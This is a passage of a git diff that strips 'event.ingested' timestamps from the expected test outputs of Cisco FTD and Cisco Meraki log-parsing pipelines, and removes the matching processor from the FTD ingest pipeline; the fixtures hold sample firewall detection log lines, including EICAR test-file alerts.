"2021-12-29T10:00:24.981537736Z", "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", @@ -4964,7 +4895,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981538499Z", "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", @@ -5026,7 +4956,6 @@ }, "event": { "severity": 5, - "ingested": "2021-12-29T10:00:24.981539265Z", "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json index 97b3aa17e73..eb319af746d 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-connection.log-expected.json @@ -62,7 +62,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:48.267947324Z", "original": "2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -178,7 +177,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:48.267950193Z", "original": "2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity", "code": "430003", "kind": "event", @@ -317,7 +315,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:48.267951306Z", "original": "2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address", "code": "430002", "kind": "event", @@ -456,7 +453,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:48.267952266Z", "original": "2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395", "code": "430003", "kind": "event", @@ -590,7 +586,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:48.267953190Z", "original": "2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -733,7 +728,6 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-29T10:00:48.267954098Z", "original": "2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb", "code": "430003", "kind": "event", @@ -872,7 +866,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:48.267955013Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -1012,7 +1005,6 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-29T10:00:48.267955919Z", "original": "2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip", "code": "430003", "kind": "event", @@ -1136,7 +1128,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:48.267956814Z", "original": "2019-08-16T09:35:15Z firepower %FTD-1-430002: AccessControlRuleAction: Block, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Block-inbound-ICMP, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 0, ResponderPackets: 0, InitiatorBytes: 0, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity", "code": "430002", "kind": "event", @@ -1268,7 +1259,6 @@ "event": { "severity": 1, "duration": 1000000000, - "ingested": "2021-12-29T10:00:48.267957712Z", "original": "Aug 14 2019 15:09:41 siem-ftd %FTD-1-430003: AccessControlRuleAction: Block, AccessControlRuleReason: File Block, SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, IngressInterface: input, EgressInterface: output, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 1, FileCount: 1, InitiatorPackets: 4, ResponderPackets: 7, InitiatorBytes: 365, ResponderBytes: 1927, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: 10.0.100.30:8000, URL: http://10.0.100.30:8000/eicar_com.zip", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json index 4a954480a68..678674723fb 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-file-malware.log-expected.json @@ -61,7 +61,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762161265Z", "original": "Aug 14 2019 14:54:25 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41522, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:54:24Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -163,7 +162,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762163789Z", "original": "Aug 14 2019 14:55:02 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41526, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:55:01Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -265,7 +263,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762164652Z", "original": "Aug 14 2019 15:00:29 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41530, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:00:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com", "code": "430004", "kind": "alert", @@ -367,7 +364,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762165426Z", "original": "Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41534, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com.txt, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:01:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com.txt", "code": "430004", "kind": "alert", @@ -476,7 +472,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762166194Z", "original": "Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -589,7 +584,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762166955Z", "original": "Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -702,7 +696,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762168052Z", "original": "Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430005", "kind": "alert", @@ -830,7 +823,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762168804Z", "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", "code": "430005", "kind": "alert", @@ -944,7 +936,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762169557Z", "original": "2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", @@ -1070,7 +1061,6 @@ }, "event": { "severity": 1, - "ingested": "2021-12-29T10:00:55.762170373Z", "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json index 801d4ecc4c6..d0eceae22c2 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-security-malware-site.log-expected.json @@ -106,7 +106,6 @@ "event": { "severity": 0, "duration": 20000000000, - "ingested": "2021-12-29T10:01:25.059010401Z", "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml index bc3fb0f7578..5b050c3660c 100644 --- a/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_ftd/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: "Pipeline for Cisco FTD logs" processors: - - set: - field: event.ingested - value: "{{_ingest.timestamp}}" - rename: field: message target_field: event.original diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index 213f16f19ce..56b11c82527 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json @@ -4,9 +4,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402787257Z" - }, "message": "modtempo 1454047799.olab nto_ security_event olaborissecurity_event tur url=https://example.org/odoco/ria.jpg?ritin=uredolor#tatemac src=10.15.44.253:5078 dst=10.193.124.51:5293 mac=01:00:5e:28:ae:7d name=psa sha256=umq disposition=ntium action=deny", "tags": [ "preserve_original_event" @@ -16,9 +13,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402790126Z" - }, "message": "umdo 1455282753.itessequ vol_ events dhcp lease of ip 10.102.218.31 from server mac 01:00:5e:9c:c2:9c for client mac 01:00:5e:0f:87:e3 from router 10.15.16.212 on subnet ameaqu with dns aqu", "tags": [ "preserve_original_event" @@ -28,9 +22,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402791078Z" - }, "message": "uipexea 1456517708.tatio minim_ flows ceroinBC flows src=10.179.60.216 dst=10.69.53.104 protocol=udp pattern: 0 reprehe", "tags": [ "preserve_original_event" @@ -40,9 +31,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402791945Z" - }, "message": "mipsu 1457752662.consec taliquip_ flows radip flows block src=10.155.236.240 dst=10.112.46.169 mac=01:00:5e:7a:74:89 protocol=ipv6 type=roidents ", "tags": [ "preserve_original_event" @@ -52,9 +40,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402792809Z" - }, "message": "obeataev 1458987616.lor uidexea_appliance events MAC 01:00:5e:e1:89:ac and MAC 01:00:5e:a3:d9:ac both claim IP: 10.14.107.140", "tags": [ "preserve_original_event" @@ -64,9 +49,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402793701Z" - }, "message": "iutal 1460222571.dexe urerep events content_filtering_block url='https://api.example.org/liqu/lorem.gif?ueipsaqu=uidolore#niamqu' category0='ari' server='10.108.180.105:5098' client_mac='01:00:5e:40:9b:83'", "tags": [ "preserve_original_event" @@ -76,9 +58,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402797371Z" - }, "message": "ipit 1461457525.idexea riat_appliance events MAC 01:00:5e:25:4f:e4 and MAC 01:00:5e:3f:49:e4 both claim IP: 10.149.88.198", "tags": [ "preserve_original_event" @@ -88,9 +67,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402798420Z" - }, "message": "ntsuntin 1462692479.aecatcup animi events dhcp release for mac 01:00:5e:e3:10:34", "tags": [ "preserve_original_event" @@ -100,9 +76,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402799284Z" - }, "message": "orsitame 1463927433.quiratio ite events MAC 01:00:5e:48:62:22 and MAC 01:00:5e:9f:b6:a6 both claim IP: 10.243.206.225", "tags": [ "preserve_original_event" @@ -112,9 +85,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402800146Z" - }, "message": "olupta turveli.toccae tatno_ ids-alerts taliqu ids-alerts signature=temUten priority=ccusan timestamp=1465162388.iqudirection=outbound protocol=icmp src=10.131.82.116:7307", "tags": [ "preserve_original_event" @@ -124,9 +94,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402801009Z" - }, "message": "uaera 1466397342.sitas ehenderi_ security_event atquovosecurity_event iumto url=https://www5.example.net/sun/essecill.html?saute=vel#quu src=10.210.213.18:7616 dst=10.134.0.141:2703 mac=01:00:5e:aa:42:fa name=idolores sha256=llumquid disposition=tation action=accept", "tags": [ "preserve_original_event" @@ -136,9 +103,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402802103Z" - }, "message": "omn ipsumq.atcu oremagna_ security_event remipsum security_event liq signature=ist priority=tnon timestamp=1467632296.ionul shost=01:00:5e:c8:9c:2f direction=outbound protocol=udp src=10.163.72.17 dst=10.74.237.180 message:nsequu", "tags": [ "preserve_original_event" @@ -148,9 +112,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402802989Z" - }, "message": "omm 1468867250.idestla Nemoeni_appliance events MAC 01:00:5e:c4:69:7f and MAC 01:00:5e:e2:67:d2 both claim IP: 10.72.31.26", "tags": [ "preserve_original_event" @@ -160,9 +121,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402803848Z" - }, "message": "agna tionemu.eomnisis mqui ids-alerts signature=civeli priority=errorsi timestamp=1470102205.desdirection=internal protocol=tcp src=10.70.95.74:4290", "tags": [ "preserve_original_event" @@ -172,9 +130,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402804715Z" - }, "message": "olupt 1471337159.dit sumquiad events MAC 01:00:5e:ea:e8:7a and MAC 01:00:5e:9c:d2:4a both claim IP: 10.17.21.125", "tags": [ "preserve_original_event" @@ -184,9 +139,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402805575Z" - }, "message": "amqu 1472572113.uines nsec events dhcp lease of ip 10.85.10.165 from server mac 01:00:5e:63:93:48 for client mac 01:00:5e:46:17:35 from router 10.53.150.119 on subnet uiineavo with dns tisetq", "tags": [ "preserve_original_event" @@ -196,9 +148,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402806636Z" - }, "message": "giatquov eritquii.dexeac iscinge ids-alerts signature=atvol priority=umiur timestamp=1473807067.imadprotocol=igmp src=10.88.231.224 dst=10.187.77.245message: iadese", "tags": [ "preserve_original_event" @@ -208,9 +157,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402807497Z" - }, "message": "agnaali 1475042022.gnam tat events content_filtering_block url='https://internal.example.com/quae/maccusa.htm?rQuisau=idex#xerci' category0='aqu' server='10.186.58.115:7238' client_mac='01:00:5e:8f:16:6d'", "tags": [ "preserve_original_event" @@ -220,9 +166,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402808365Z" - }, "message": "apariat 1476276976.tlabore untmolli_ events dhcp lease of ip 10.219.84.37 from server mac 01:00:5e:e8:bf:69 for client mac 01:00:5e:87:e1:a0 from router 10.205.47.51 on subnet uovolup with dns samvolu", "tags": [ "preserve_original_event" @@ -232,9 +175,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402809273Z" - }, "message": "ento 1477511930.pic evita events MAC 01:00:5e:ce:61:db and MAC 01:00:5e:ec:f8:cc both claim IP: 10.3.134.237", "tags": [ "preserve_original_event" @@ -244,9 +184,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402810162Z" - }, "message": "tmo 1478746884.fficiade uscipit events aid=vitaedi arp_resp=fugitse arp_src=veniamq auth_neg_dur=one auth_neg_failed=etMalor channel=ipi dns_req_rtt=reseos dns_resp=pariatu dns_server=tin duration=48.123000 full_conn=oquisqu identity=sperna ip_resp=eabilloi ip_src=10.182.178.217 is_8021x=tlab is_wpa=volupt last_auth_ago=osqui radio=xerc reason=iutali rssi=fdeFi type=texp vap=tasuntex client_mac=01:00:5e:e3:b1:24 client_ip=10.194.114.58 instigator=ectio http_resp=dutper dhcp_lease_completed=lamcolab dhcp_ip=ati dhcp_server=tlabo dhcp_server_mac=uames dhcp_resp=iduntu url=https://internal.example.net/ris/uamqu.txt?liqui=quioffi#uptate category0=ncidid server=10.63.194.87 vpn_type=quisno connectivity=sin", "tags": [ "preserve_original_event" @@ -256,9 +193,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402811026Z" - }, "message": "emvel 1479981839.tmollita fde events aid=nsecte arp_resp=inculpa arp_src=abo auth_neg_dur=veniamqu auth_neg_failed=nse channel=non dns_req_rtt=paquioff dns_resp=mquisnos dns_server=maven duration=71.798000 full_conn=atcu identity=labor ip_resp=didunt ip_src=10.153.0.77 is_8021x=udan is_wpa=orema last_auth_ago=invento radio=qua reason=aturQui rssi=utlabor type=rau vap=idex client_mac=01:00:5e:9e:7b:a4 client_ip=10.105.88.20 instigator=ecte http_resp=tinvolu dhcp_lease_completed=iurer dhcp_ip=iciadese dhcp_server=quidolor dhcp_server_mac=tessec dhcp_resp=olupta url=https://mail.example.com/icabo/itatio.jpg?eleum=sintoc#volupt category0=siste server=10.163.154.210 vpn_type=ept connectivity=iumtotam", "tags": [ "preserve_original_event" @@ -268,9 +202,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402811950Z" - }, "message": "ionevo 1481216793.ugiatnu ciati_appliance events MAC 01:00:5e:b8:7a:96 and MAC 01:00:5e:b9:6b:a8 both claim IP: 10.73.69.176", "tags": [ "preserve_original_event" @@ -280,9 +211,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402812929Z" - }, "message": "spi 1482451747.stquido ommodico_ flows ese flows allow src=10.145.248.111 dst=10.57.6.252 mac=01:00:5e:94:6a:cf protocol=udp ", "tags": [ "preserve_original_event" @@ -292,9 